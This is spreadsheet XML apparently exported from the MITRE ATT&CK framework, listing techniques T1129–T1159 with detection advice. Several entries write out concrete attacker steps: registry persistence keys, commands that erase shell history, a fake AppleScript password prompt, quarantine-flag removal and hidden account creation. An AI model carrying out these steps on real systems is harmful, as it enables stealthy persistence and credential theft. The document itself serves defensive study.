    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF252525"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t> registry key for any new or suspicious entries that do not correlate with known system files or benign software</t>
    </r>
  </si>
  <si>
    <t>Process monitoring,Windows Registry</t>
  </si>
  <si>
    <t>T1129</t>
  </si>
  <si>
    <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
The module loader can load DLLs:
via specification of the (fully-qualified or relative) DLL pathname in the IMPORT directory;
via EXPORT forwarded to another DLL, specified with (fully-qualified or relative) pathname (but without extension);
via an NTFS junction or symlink program.exe.local with the fully-qualified or relative pathname of a directory containing the DLLs specified in the IMPORT directory or forwarded EXPORTs;
via &lt;file name="filename.extension" loadFrom="fully-qualified or relative pathname"&gt; in an embedded or external "application manifest". The file name refers to an entry in the IMPORT directory or a forwarded EXPORT.
Adversaries can use this functionality as a way to execute arbitrary code on a system.</t>
  </si>
  <si>
    <t>Monitoring DLL module loads may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances, since benign use of Windows modules load functions are common and may be difficult to distinguish from malicious behavior. Legitimate software will likely only need to load routine, bundled DLL modules or Windows system DLLs such that deviation from known module loads may be suspicious. Limiting DLL module loads to %SystemRoot% and %ProgramFiles% directories will protect against module loads from unsafe paths.
Correlation of other events with behavior surrounding module loads using API monitoring and suspicious DLLs written to disk will provide additional context to an event that may assist in determining if it is due to malicious behavior.</t>
  </si>
  <si>
    <t>Process Monitoring,API monitoring,File monitoring,DLL monitoring</t>
  </si>
  <si>
    <t>T1130</t>
  </si>
  <si>
    <t>0 Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate.133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credentials.106
Atypical root certificates have also been pre-installed on systems by the manufacturer or in the software supply chain and were used in conjunction with malware/adware to provide a man-in-the-middle capability for intercepting information transmitted over secure TLS/SSL communications</t>
  </si>
  <si>
    <t>A system's root certificates are unlikely to change frequently. Monitor new certificates installed on a system that could be due to malicious activity. Check pre-installed certificates on new systems to ensure unnecessary or suspicious certificates are not present.</t>
  </si>
  <si>
    <t>SSL/TLS inspection,Digital Certificate Logs,Windows registry</t>
  </si>
  <si>
    <t>T1131</t>
  </si>
  <si>
    <t>Windows Authentication Package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system.135 Adversaries can use the autostart mechanism provided by LSA Authentication Packages for persistence by placing a reference to a binary in the Windows Registry location HKLM\SYSTEM\CurrentControlSet\Control\Lsa\ with the key value of "Authentication Packages"=&lt;target binary&gt;. The binary will then be executed by the system when the authentication packages are loaded.</t>
  </si>
  <si>
    <t>Monitor the Registry for changes to the LSA Registry keys. Monitor the LSA process for DLL loads. Windows 8.1 and Windows Server 2012 R2 may generate events when unsigned DLLs try to load into the LSA by setting the Registry key HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\LSASS.exe with AuditLevel = 8</t>
  </si>
  <si>
    <t>DLL monitoring,Windows Registry,Loaded DLLs,Process monitoring</t>
  </si>
  <si>
    <t>T1132</t>
  </si>
  <si>
    <t>Command and control (C2) information is encoded using a standard data encoding system. Use of data encoding may be to adhere to existing protocol specifications and includes use of ASCII, Unicode, Base64, MIME, UTF-8, or other binary-to-text and character encoding systems.Some data encoding systems may also result in data compression, such as gzip.</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</si>
  <si>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t>
  </si>
  <si>
    <t>Packet capture,Process use of network,Process Monitoring,Network protocol analysis,Signature matching</t>
  </si>
  <si>
    <t>T1133</t>
  </si>
  <si>
    <t xml:space="preserve"> Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Adversaries may use remote services to access and persist within a network.45 Access to Legitimate Credentials to use the service is often a requirement, which could be obtained through credential pharming or by obtaining the credentials from users after compromising the enterprise network. Access to remote services may be used as part of Redundant Access during an operation.</t>
  </si>
  <si>
    <t>Follow best practices for detecting adversary use of Legitimate Credentials for authenticating to remote services. Collect authentication logs and analyze for unusual access patterns, windows of activity, and access outside of normal business hours.</t>
  </si>
  <si>
    <t>T1134</t>
  </si>
  <si>
    <t>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&lt;code&gt;runas&lt;/code&gt;. Microsoft runas
Adversaries may use access tokens to operate under a different user or system security context to perform actions and evade detection.   An adversary can use built-in Windows API functions to copy access tokens from existing processes; this is known as token stealing.  An adversary must already be in a privileged user context (i.e. administrator) to steal a token.  However, adversaries commonly use token stealing to elevate their security context from the administrator level to the SYSTEM level.Pentestlab Token Manipulation
Adversaries can also create spoofed access tokens if they know the credentials of a user.  Any standard user can use the &lt;code&gt;runas&lt;/code&gt; command, and the Windows API functions, to do this; it does not require access to an administrator account.
Lastly, an adversary can use a spoofed token to authenticate to a remote system as the account for that token if the account has appropriate permissions on the remote system.
Metasploit?s Meterpreter payload allows arbitrary token stealing and uses token stealing to escalate privileges. Metasploit access token  The Cobalt Strike beacon payload allows arbitrary token stealing and can also create tokens. Cobalt Strike Access Token</t>
  </si>
  <si>
    <t>If an adversary is using a standard command-line shell, analysts can detect token manipulation by auditing command-line activity.  Specifically, analysts should look for use of the &lt;code&gt;runas&lt;/code&gt; command. Detailed command-line logging is not enabled by default in Windows.Microsoft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There are many Windows API calls a payload can take advantage of to manipulate access tokens (e.g., &lt;code&gt;LogonUser&lt;/code&gt;Microsoft LogonUser, &lt;code&gt;DuplicateTokenEx&lt;/code&gt;Microsoft DuplicateTokenEx, and &lt;code&gt;ImpersonateLoggedOnUser&lt;/code&gt;Microsoft ImpersonateLoggedOnUser).  Please see the referenced Windows API pages for more information.</t>
  </si>
  <si>
    <t>Process command-line parameters,API monitoring,Windows event logs</t>
  </si>
  <si>
    <t>T1135</t>
  </si>
  <si>
    <t>Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network. 
===Windows===
File sharing over a Windows network occurs over the SMB protocol.Wikipedia Shared ResourceTechNet Shared Folder
[[Software/S0039|Net]] can be used to query a remote system for available shared drives using the &lt;code&gt;net view \\remotesystem&lt;/code&gt; command. It can also be used to query shared drives on the local system using &lt;code&gt;net share&lt;/code&gt;.
Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for [[Collection]] and to identify potential systems of interest for [[Lateral Movement]].
===Mac===
On Mac, locally mounted shares can be viewed with the &lt;code&gt;df -aH&lt;/code&gt; command.</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</si>
  <si>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[[Technique/T1047|Windows Management Instrumentation]] and [[Technique/T1086|PowerShell]].</t>
  </si>
  <si>
    <t>Process Monitoring,Process command-line parameters,Network protocol analysis,Process use of network,PowerShell logs,Syslog monitoring,Authentication logs</t>
  </si>
  <si>
    <t>T1136</t>
  </si>
  <si>
    <t>Adversaries with a sufficient level of access may create a local system or domain account. Such accounts may be used for persistence that do not require persistent remote access tools to be deployed on the system.
The &lt;code&gt;net user&lt;/code&gt; commands can be used to create a local or domain account.</t>
  </si>
  <si>
    <t>Collect data on account creation within a network. Event ID 4720 is generated when a user account is created on a Windows system and domain controller.Microsoft User Creation Event Perform regular audits of domain and local system accounts to detect suspicious accounts that may have been created by an adversary.</t>
  </si>
  <si>
    <t>Process Monitoring,Process command-line parameters,Authentication logs,Windows event logs,Syslog monitoring</t>
  </si>
  <si>
    <t>T1137</t>
  </si>
  <si>
    <t>Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started.
===Office Template Macros===
Microsoft Office contains templates that are part of common Office applications and are used to customize styles. The base templates within the application are used each time an application starts.Microsoft Change Normal Template
Office Visual Basic for Applications (VBA) macrosMSDN VBA in Office can inserted into the base templated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loaded.enigma0x3 normal.dotmHexacorn Office Template Macros
Word Normal.dotm location:&lt;code&gt;C:\Users\(username)\AppData\Roaming\Microsoft\Templates\Normal.dotm&lt;/code&gt;
Excel Personal.xlsb location:&lt;code&gt;C:\Users\(username)\AppData\Roaming\Microsoft\Excel\XLSTART\PERSONAL.XLSB&lt;/code&gt;
An adversary may need to enable macros to execute unrestricted depending on the system or enterprise security policy on use of macros.
===Office Test===
A Registry location was found that when a DLL reference was placed within it the corresponding DLL pointed to by the binary path would be executed every time an Office application is startedHexacorn Office Test
&lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf&lt;/code&gt;
===Add-ins===
Office add-ins can be used to add functionality to Office programs.Microsoft Office Add-ins
Add-ins can also be used to obtain persistence because they can be set to execute code when an Office application starts. There are different types of add-ins that can be used by the various Office products; including Word/Excel add-in Libraries (WLL/XLL), VBA add-ins, Office Component Object Model (COM) add-ins, automation add-ins, VBA Editor (VBE), and Visual Studio Tools for Office (VSTO) add-ins.MRWLabs Office Persistence Add-ins</t>
  </si>
  <si>
    <t>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 Modification to base templated, like Normal.dotm, should also be investigated since the base templates should likely not contain VBA macros. Changes to the Office macro security settings should also be investigated.
Monitor and validate the Office trusted locations on the file system and audit the Registry entries relevant for enabling add-ins.MRWLabs Office Persistence Add-ins
Non-standard process execution trees may also indicate suspicious or malicious behavior. Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. If winword.exe is the parent process for suspicious processes and activity relating to other adversarial techniques, then it could indicate that the application was used maliciously.</t>
  </si>
  <si>
    <t>Process monitoring,Process command-line parameters,Windows Registry,File monitoring</t>
  </si>
  <si>
    <t>T1138</t>
  </si>
  <si>
    <t>The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow compatibility of programs as Windows updates and changes its code. For example, application shimming feature that allows programs that were created for Windows XP to work with Windows 10.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API hooking to redirect the code as necessary in order to communicate with the OS. A list of all shims currently installed by the default Windows installer (sdbinst.exe) is kept in:
* &lt;code&gt;%WINDIR%\AppPatch\sysmain.sdb&lt;/code&gt;
* &lt;code&gt;hklm\software\microsoft\windows nt\currentversion\appcompatflags\installedsdb&lt;/code&gt;
Custom databases are stored in:
* &lt;code&gt;%WINDIR%\AppPatch\custom &amp; %WINDIR%\AppPatch\AppPatch64\Custom&lt;/code&gt;
* &lt;code&gt;hklm\software\microsoft\windows nt\currentversion\appcompatflags\custom&lt;/code&gt;
To keep shims secure, Windows designed them to run in user mode so they cannot modify the kernel and you must have administrator privileges to install a shim. However, certain shims can be used to [[Technique/T1088|Bypass User Account Control]] (UAC) (RedirectEXE), inject DLLs into processes (InjectDll), and intercept memory addresses (GetProcAddress). Utilizing these shims, an adversary can perform several malicious acts, such as elevate privileges, install backdoors, disable defenses like Windows Defender, etc.</t>
  </si>
  <si>
    <t>There are several public tools available that will detect shims that are currently availableBlack Hat 2015 App Shim:
* Shim-Process-Scanner - checks memory of every running process for any Shim flags
* Shim-Detector-Lite - detects installation of custom shim databases
* Shim-Guard - monitors registry for any shim installations
* ShimScanner - forensic tool to find active shims in memory
* ShimCacheMem - Volatility plug-in that pulls shim cache from memory (note: shims are only cached after reboot)
Monitor process execution for sdbinst.exe and command-line arguments for potential indications of application shim abuse.</t>
  </si>
  <si>
    <t>Loaded DLLs,System calls,Process Monitoring,Process command-line parameters</t>
  </si>
  <si>
    <t>T1139</t>
  </si>
  <si>
    <t>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credentials.External to DA, the OS X Way</t>
  </si>
  <si>
    <t>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t>
  </si>
  <si>
    <t>File monitoring,Process monitoring,Process command-line parameters,Syslog monitoring</t>
  </si>
  <si>
    <t>T1140</t>
  </si>
  <si>
    <t>Adversaries may use [[Technique/T1027|Obfuscated Files or Information]] to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware, [[Technique/T1064|Scripting]], [[Technique/T1086|PowerShell]], or by using utilities present on the system.
One such example is use of [[Software/S0160|certutil]] to decode a remote access tool portable executable file that has been hidden inside a certificate file.Malwarebytes Targeted Attack against Saudi Arabia</t>
  </si>
  <si>
    <t>Detecting the action of deobfuscating or decoding files or information may be difficult depending on the implementation. If the functionality is contained within malware and uses the Windows API, then attempting to detect malicious behavior before or after the action may yield better results than attempting to perform analysis on loaded libraries or API calls. If scripts are used, then collecting the scripts for analysis may be necessary. Perform process and command-line monitoring to detect potentially malicious behavior related to scripts and system utilities such as [[Software/S0160|certutil]].</t>
  </si>
  <si>
    <t>File monitoring,Process Monitoring,Process command-line parameters,API Monitoring</t>
  </si>
  <si>
    <t>T1141</t>
  </si>
  <si>
    <t>When programs are executed that need additional privileges than are present in the current user context, it is common for the operating system to prompt the user for proper credentials to authorize the elevated privileges for the task. Adversaries can mimic this functionality to prompt users for credentials with a normal-looking prompt. This type of prompt can be accomplished with AppleScript:
&lt;code&gt;set thePassword to the text returned of (display dialog "AdobeUpdater needs permission to check for updates. Please authenticate." default answer "")&lt;/code&gt;
OSX Keydnap malware
Adversaries can prompt a user for a number of reasons that mimic normal usage, such as a fake installer requiring additional access or a fake malware removal suite.OSX Malware Exploits MacKeeper</t>
  </si>
  <si>
    <t>This technique exploits users' tendencies to always supply credentials when prompted, which makes it very difficult to detect. Monitor process execution for unusual programs as well as AppleScript that could be used to prompt users for credentials.</t>
  </si>
  <si>
    <t>User interface,Process Monitoring</t>
  </si>
  <si>
    <t>T1142</t>
  </si>
  <si>
    <t>Keychains are the built-in way for macOS to keep track of users' passwords and credentials for many services and features such as WiFi passwords, websites, secure notes, certificates, and Kerberos. Keychain files are located in &lt;code&gt;~/Library/Keychains/&lt;/code&gt;,&lt;code&gt;/Library/Keychains/&lt;/code&gt;, and &lt;code&gt;/Network/Library/Keychains/&lt;/code&gt;.Wikipedia keychain The &lt;code&gt;security&lt;/code&gt; command-line utility, which is built into macOS by default, provides a useful way to manage these credentials.
To manage their credentials, users have to use additional credentials to access their keychain. If an adversary knows the credentials for the login keychain, then they can get access to all the other credentials stored in this vault.External to DA, the OS X Way By default, the passphrase for the keychain is the user?s logon credentials.</t>
  </si>
  <si>
    <t>Unlocking the keychain and using passwords from it is a very common process, so there is likely to be a lot of noise in any detection technique. Monitoring of system calls to the keychain can help determine if there is a suspicious process trying to access it.</t>
  </si>
  <si>
    <t>System calls,Process Monitoring</t>
  </si>
  <si>
    <t>T1143</t>
  </si>
  <si>
    <t>The configurations for how applications run on macOS and OS X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However, adversaries can abuse this feature and hide their running window Antiquated Mac Malware.</t>
  </si>
  <si>
    <t>Plist files are ASCII text files with a specific format, so they're relatively easy to parse. File monitoring can check for the &lt;code&gt;apple.awt.UIElement&lt;/code&gt; or any other suspicious plist tag in plist files and flag them.</t>
  </si>
  <si>
    <t>T1144</t>
  </si>
  <si>
    <t>In macOS and OS X, when applications or programs are downloaded from the internet, there is a special attribute set on the file called &lt;code&gt;com.apple.quarantine&lt;/code&gt;. This attribute is read by Apple's Gatekeeper defense program at execution time and provides a prompt to the user to allow or deny execution. 
Apps loaded onto the system from USB flash drive, optical disk, external hard drive, or even from a drive shared over the local network won?t set this flag. Additionally, other utilities or events like drive-by downloads don?t necessarily set it either. This completely bypasses the built-in Gatekeeper checkMethods of Mac Malware Persistence. The presence of the quarantine flag can be checked by the xattr command &lt;code&gt;xattr /path/to/MyApp.app&lt;/code&gt; for &lt;code&gt;com.apple.quarantine&lt;/code&gt;. Similarly, given sudo access or elevated permission, this attribute can be removed with xattr as well, &lt;code&gt;sudo xattr -r -d com.apple.quarantine /path/to/MyApp.app&lt;/code&gt; Clearing quarantine attributeOceanLotus for OS X.
In typical operation, a file will be downloaded from the internet and given a quarantine flag before being saved to disk. When the user tries to open the file or application, macOS?s gatekeeper will step in and check for the presence of this flag. If it exists, then macOS will then prompt the user to confirmation that they want to run the program and will even provide the url where the application came from. However, this is all based on the file being downloaded from a quarantine-savvy application Bypassing Gatekeeper.</t>
  </si>
  <si>
    <t>Monitoring for the removal of the &lt;code&gt;com.apple.quarantine&lt;/code&gt; flag by a user instead of the operating system is a suspicious action and should be examined further.</t>
  </si>
  <si>
    <t>File monitoring,Syslog monitoring</t>
  </si>
  <si>
    <t>T1145</t>
  </si>
  <si>
    <t>Private cryptographic keys and certificates are used for authentication, encryption/decryption, and digital signatures.Wikipedia Public Key Crypto
Adversaries may gather private keys from compromised systems for use in authenticating to [[Technique/T1021|Remote Services]] like SSH or for use in decrypting other collected files such as email. Common key and certificate file extensions include: .key, .pgp, .gpg, .ppk., .p12, .pem, pfx, .cer, .p7b, .asc. Adversaries may also look in common key directories, such as &lt;code&gt;~/.ssh&lt;/code&gt; for SSH keys on *nix-based systems or &lt;code&gt;C:\Users\(username)\.ssh\&lt;/code&gt; on Windows.
Private keys should require a password or passphrase for operation, so an adversary may also use [[Technique/T1056|Input Capture]] for keylogging or attempt to [[Technique/T1110|Brute Force]] the passphrase off-line.
Adversary tools have been discovered that search compromised systems for file extensions relating to cryptographic keys and certificates.Kaspersky CaretoPalo Alto Prince of Persia</t>
  </si>
  <si>
    <t>Monitor access to files and directories related to cryptographic keys and certificates as a means for potentially detecting access patterns that may indicate collection and exfiltration activity. Collect authentication logs and look for potentially abnormal activity that may indicate improper use of keys or certificates for remote authentication.</t>
  </si>
  <si>
    <t>File monitoring,Authentication logs</t>
  </si>
  <si>
    <t>T1146</t>
  </si>
  <si>
    <t>macOS and Linux both keep track of the commands users type in their terminal so that users can easily remember what they've done. These logs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Since everything typed on the command-line is saved, passwords passed in on the command line are also saved. Adversaries can abuse this by searching these files for cleartext passwords. Additionally, adversaries can use a variety of methods to prevent their own commands from appear in these logs such as &lt;code&gt;unset HISTFILE&lt;/code&gt;, &lt;code&gt;export HISTFILESIZE=0&lt;/code&gt;, &lt;code&gt;history -c&lt;/code&gt;, &lt;code&gt;rm ~/.bash_history&lt;/code&gt;.</t>
  </si>
  <si>
    <t>User authentication, especially via remote terminal services like SSH, without new entries in that user's &lt;code&gt;~/.bash_history&lt;/code&gt; is suspicious. Additionally, the modification of the HISTFILE and HISTFILESIZE environment variables or the removal/clearing of the &lt;code&gt;~/.bash_history&lt;/code&gt; file are indicators of suspicious activity.</t>
  </si>
  <si>
    <t>Authentication logs,File monitoring</t>
  </si>
  <si>
    <t>T1147</t>
  </si>
  <si>
    <t>Every user account in macOS has a userID associated with it. When creating a user, you can specify the userID for that account. There is a property value in &lt;code&gt;/Library/Preferences/com.apple.loginwindow&lt;/code&gt; called &lt;code&gt;Hide500Users&lt;/code&gt; that prevents users with userIDs 500 and lower from appearing at the login screen. By using the [[Technique/T1136|Create Account]] technique with a userID under 500 and enabling this property (setting it to Yes), an adversary can hide their user accounts much more easily: &lt;code&gt;sudo dscl . -create /Users/username UniqueID 401&lt;/code&gt;Cybereason OSX Pirrit.</t>
  </si>
  <si>
    <t>This technique prevents the new user from showing up at the log in screen, but all of the other signs of a new user still exist. The user still gets a home directory and will appear in the authentication logs.</t>
  </si>
  <si>
    <t>T1148</t>
  </si>
  <si>
    <t>The &lt;code&gt;HISTCONTROL&lt;/code&gt; environment variable keeps track of what should be saved by the &lt;code&gt;history&lt;/code&gt; command and eventually into the &lt;code&gt;~/.bash_history&lt;/code&gt; file when a user logs out. This setting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&lt;code&gt;HISTCONTROL&lt;/code&gt; does not exist by default on macOS, but can be set by the user and will be respected. Adversaries can use this to operate without leaving traces by simply prepending a space to all of their terminal commands.</t>
  </si>
  <si>
    <t>Correlating a user session with a distinct lack of new commands in their &lt;code&gt;.bash_history&lt;/code&gt; can be a clue to suspicious behavior. Additionally, users checking or changing their &lt;code&gt;HISTCONTROL&lt;/code&gt; environment variable is also suspicious.</t>
  </si>
  <si>
    <t>Process Monitoring,Authentication logs,File monitoring,Environment variable</t>
  </si>
  <si>
    <t>T1149</t>
  </si>
  <si>
    <t>As of OS X 10.8, mach-O binaries introduced a new header called LC_MAIN that points to the binary?s entry point for execution. Previously, there were two headers to achieve this same effect: LC_THREAD and LC_UNIXTHREAD Prolific OSX Malware History. The entry point for a binary can be hijacked so that initial execution flows to a malicious addition (either another section or a code cave) and then goes back to the initial entry point so that the victim doesn?t know anything was different Methods of Mac Malware Persistence. By modifying a binary in this way, application whitelisting can be bypassed because the file name or application path is still the same.</t>
  </si>
  <si>
    <t>Determining the original entry point for a binary is difficult, but checksum and signature verification is very possible. Modifying the LC_MAIN entry point or adding in an additional LC_MAIN entry point invalidates the signature for the file and can be detected. Collect running process information and compare against known applications to look for suspicious behavior.</t>
  </si>
  <si>
    <t>Binary file metadata,Malware reverse engineering,Process Monitoring,Process command-line parameters</t>
  </si>
  <si>
    <t>T1150</t>
  </si>
  <si>
    <t>Property list (plist) files contain all of the information that macOS and OS X uses to configure applications and services. These files are UT-8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&lt;code&gt;/Library/Preferences&lt;/code&gt; (which execute with elevated privileges) and &lt;code&gt;~/Library/Preferences&lt;/code&gt; (which execute with a user's privileges). 
Adversaries can modify these plist files to point to their own code, can use them to execute their code in the context of another user, bypass whitelisting procedures, or even use them as a persistence mechanismSofacy Komplex Trojan.</t>
  </si>
  <si>
    <t>File system monitoring can determine if plist files are being modified. Users should not have permission to modify these in most cases. Some software tools like "Knock Knock" can detect persistence mechanisms and point to the specific files that are being referenced. This can be helpful to see what is actually being executed.
Monitor process execution for abnormal process execution resulting from modified plist files. Monitor utilities used to modify plist files or that take a plist file as an argument, which may indicate suspicious activity.</t>
  </si>
  <si>
    <t>File monitoring,Process Monitoring,Process command-line parameters</t>
  </si>
  <si>
    <t>T1151</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</si>
  <si>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evil.bin, when it is double clicked by a user, it will launch Terminal.app and execute. If this file is renamed to evil.txt, then when double clicked by a user, it will launch with the default text editing application (not executing the binary). However, if the file is renamed to "evil.txt " (note the space at the end), then when double clicked by a user, the true file type is determined by the OS and handled appropriately and the binary will be executedMac Backdoors are back. 
Adversaries can use this feature to trick users into double clicking benign-looking files of any format and ultimately executing something malicious.</t>
  </si>
  <si>
    <t>It's not common for spaces to be at the end of filenames, so this is something that can easily be checked with file monitoring. From the user's perspective though, this is very hard to notice from within the Finder.app or on the command-line in Terminal.app. Processes executed from binaries containing non-standard extensions in the filename are suspicious.</t>
  </si>
  <si>
    <t>Defense Evasion,Execution,Persistence</t>
  </si>
  <si>
    <t>T1152</t>
  </si>
  <si>
    <t>Launchctl controls the macOS launchd process which handles things like launch agents and launch daemons, but can execute other commands or programs itself. Launchctl supports taking subcommands on the command-line, interactively, or even redirected from standard input. By loading or reloading launch agents or launch daemons, adversaries can install persistence or execute changes they made Sofacy Komplex Trojan. Running a command from launchctl is as simple as &lt;code&gt;launchctl submit -l &lt;labelName&gt; -- /Path/to/thing/to/execute "arg" "arg" "arg"&lt;/code&gt;. Loading, unloading, or reloading launch agents or launch daemons can require elevated privileges. 
Adversaries can abuse this functionality to execute code or even bypass whitelisting if launchctl is an allowed process.</t>
  </si>
  <si>
    <t>Knock Knock can be used to detect persistent programs such as those installed via launchctl as launch agents or launch daemons. Additionally, every launch agent or launch daemon must have a corresponding plist file on disk somewhere which can be monitored. Monitor process execution from launchctl/launchd for unusual or unknown processes.</t>
  </si>
  <si>
    <t>T1153</t>
  </si>
  <si>
    <t>The &lt;code&gt;source&lt;/code&gt; command loads functions into the current shell or executes files in the current context. This built-in command can be run in two different ways &lt;code&gt;source /path/to/filename [arguments]&lt;/code&gt; or &lt;code&gt;. /path/to/filename [arguments]&lt;/code&gt;. Take note of the space after the ".". Without a space, a new shell is created that runs the program instead of running the program within the current context. This is often used to make certain features or functions available to a shell or to update a specific shell's environment. 
Adversaries can abuse this functionality to execute programs. The file executed with this technique does not need to be marked executable beforehand.</t>
  </si>
  <si>
    <t>Monitor for command shell execution of source and subsequent processes that are started as a result of being executed by a source command. Adversaries must also drop a file to disk in order to execute it with source, and these files can also detected by file monitoring.</t>
  </si>
  <si>
    <t>Process Monitoring,File monitoring,Process command-line parameters</t>
  </si>
  <si>
    <t>Execution,Persistence</t>
  </si>
  <si>
    <t>T1154</t>
  </si>
  <si>
    <t>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either to gain execution or as a persistence mechanism. Trap commands are of the following format &lt;code&gt;trap 'command list' signals&lt;/code&gt; where "command list" will be executed when "signals" are received.</t>
  </si>
  <si>
    <t>Trap commands must be registered for the shell or programs, so they appear in files. Monitoring files for suspicious or overly broad trap commands can narrow down suspicious behavior during an investigation. Monitor for suspicious processes executed through trap interrupts.</t>
  </si>
  <si>
    <t>T1155</t>
  </si>
  <si>
    <t>macOS and OS X applications send AppleEvent messages to each other for interprocess communications (IPC). These messages can be easily scripted with AppleScript for local or remote IPC. Osascript executes AppleScript and any other Open Scripting Architecture (OSA) language scripts. A list of OSA languages installed on a system can be found by using the &lt;code&gt;osalang&lt;/code&gt; program.
AppleEvent messages can be sent independently or as part of a script. These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely. 
Adversaries can use this to interact with open SSH connection, move to remote machines, and even present users with fake dialog boxes. These events cannot start applications remotely (they can start them locally though), but can interact with applications if they're already running remotely. Since this is a scripting language, it can be used to launch more common techniques as well such as a reverse shell via python Macro Malware Targets Macs. Scripts can be run from the command lie via &lt;code&gt;osascript /path/to/script&lt;/code&gt; or &lt;code&gt;osascript -e "script here"&lt;/code&gt;.</t>
  </si>
  <si>
    <t>Monitor for execution of AppleScript through osascript that may be related to other suspicious behavior occurring on the system.</t>
  </si>
  <si>
    <t>API monitoring,System calls,Process Monitoring,Process command-line parameters</t>
  </si>
  <si>
    <t>T1156</t>
  </si>
  <si>
    <t>&lt;code&gt;~/.bash_profile&lt;/code&gt; and &lt;code&gt;~/.bashrc&lt;/code&gt; are executed in a user's context when a new shell opens or when a user logs in so that their environment is set correctly. &lt;code&gt;~/.bash_profile&lt;/code&gt; is executed for login shells and &lt;code&gt;~/.bashrc&lt;/code&gt; is executed for interactive non-login shells. This means that when a user logs in (via username and password) to the console (either locally or remotely via something like SSH), &lt;code&gt;~/.bash_profile&lt;/code&gt; is executed before the initial command prompt is returned to the user. After that, every time a new shell is opened, &lt;code&gt;~/.bashrc&lt;/code&gt; is executed. This allows users more fine grained control over when they want certain commands executed.
Mac's Terminal.app is a little different in that it runs a login shell by default each time a new terminal window is opened, thus calling &lt;code&gt;~/.bash_profile&lt;/code&gt; each time instead of &lt;code&gt;~/.bashrc&lt;/code&gt;.
These files are meant to be written to by the local user to configure their own environment; however, adversaries can also insert code into these files to gain persistence each time a user logs in or opens a new shell.</t>
  </si>
  <si>
    <t>While users may customize their &lt;code&gt;~/.bashrc&lt;/code&gt; and &lt;code&gt;~/.bash_profile&lt;/code&gt; files , there are only certain types of commands that typically appear in these files. Monitor for abnormal commands such as execution of unknown programs, opening network sockets, or reaching out across the network when user profiles are loaded during the login process.</t>
  </si>
  <si>
    <t>File monitoring,Process Monitoring,Process command-line parameters,Process use of network,Netflow/Enclave netflow</t>
  </si>
  <si>
    <t>T1157</t>
  </si>
  <si>
    <t>macOS and OS X use a common method to look for required dynamic libraries (dylib) to load into a program based on search paths. Adversaries can take advantage of ambiguous paths to plant dylibs to gain privilege escalation or persistence.
A common method is to see what dylibs an application uses, then plant a malicious version with the same name higher up in the search path. This typically results in the dylib being in the same folder as the application itselfWriting Bad Malware for OSXMalware Persistence on OS X.
If the program is configured to run at a higher privilege level than the current user, then when the dylib is loaded into the application, the dylib will also run at that elevated level. This can be used by adversaries as a privilege escalation technique.</t>
  </si>
  <si>
    <t>Objective-See's Dylib Hijacking Scanner can be used to detect potential cases of dylib hijacking. Monitor file systems for moving, renaming, replacing, or modifying dylibs. Changes in the set of dylibs that are loaded by a process (compared to past behavior) that do not correlate with known software, patches, etc., are suspicious. Check the system for multiple dylibs with the same name and monitor which versions have historically been loaded into a process.</t>
  </si>
  <si>
    <t>T1158</t>
  </si>
  <si>
    <t>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===Windows===
Users can mark specific files as hidden by using the attrib.exe binary. Simply do &lt;code&gt;attrib +h filename&lt;/code&gt; to mark a file or folder as hidden. Similarly, the ?+s? marks a file as a system file and the ?+r? flag marks the file as read only. Like most windows binaries, the attrib.exe binary provides the ability to apply these changes recursively ?/S?.
===Linux/Mac===
Users can mark specific files as hidden simply by putting a ?.? as the first character in the file or folder name Sofacy Komplex TrojanAntiquated Mac Malware. Files and folder that start with a period, ?.?, are by default hidden from being viewed in the Finder application and standard command-line utilities like ?ls?. Users must specifically change settings to have these files viewable. For command line usages, there is typically a flag to see all files (including hidden ones). To view these files in the Finder Application, the following command must be executed: &lt;code&gt;defaults write com.apple.finder AppleShowAllFiles YES&lt;/code&gt;, and then relaunch the Finder Application.
===Mac===
Files on macOS can be marked with the UF_HIDDEN flag which prevents them from being seen in Finder.app, but still allows them to be seen in Terminal.appWireLurker.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for persistence and evading a typical user or system analysis that does not incorporate investigation of hidden files.</t>
  </si>
  <si>
    <t>Monitor the file system and shell commands for files being created with a leading "." and the Windows command-line use of attrib.exe to add the hidden attribute.</t>
  </si>
  <si>
    <t>File monitoring,Process Monitoring,Process command-line parameters,Syslog monitoring</t>
  </si>
  <si>
    <t>T1159</t>
  </si>
  <si>
    <t>Per Apple?s developer documentation, when a user logs in, a per-user launchd process is started which loads the parameters for each launch-on-demand user agent from the property list (plist) files found in &lt;code&gt;/System/Library/LaunchAgents&lt;/code&gt;, &lt;code&gt;/Library/LaunchAgents&lt;/code&gt;, and &lt;code&gt;$HOME/Library/LaunchAgents&lt;/code&gt;AppleDocs Launch Agent DaemonsOSX Keydnap malwareAntiquated Mac Malware.  These launch agents have property list files which point to the executables that will be launchedOSX.Dok Malware.
Adversaries may install a new launch agent that can be configured to execute at login by using launchd or launchctl to load a plist into the appropriate directories Sofacy Komplex Trojan Methods of Mac Malware Persistence. The agent name may be disguised by using a name from a related operating system or benign software. Launch Agents are created with user level privileges and are executed with the privileges of the user when they log inOSX Malware DetectionOceanLotus for OS X. They can be set up to execute when a specific user logs in (in the specific user?s directory structure) or when any user logs in (which requires administrator privileges).</t>
  </si>
  <si>
    <t>Monitor Launch Agent creation through additional plist files and utilities such as Objective-See?s  KnockKnock application. Launch Agents also require files on disk for persistence which can also be monitored via other file monitoring applications.</t>
  </si>
  <si>
    <t>T1160</t>
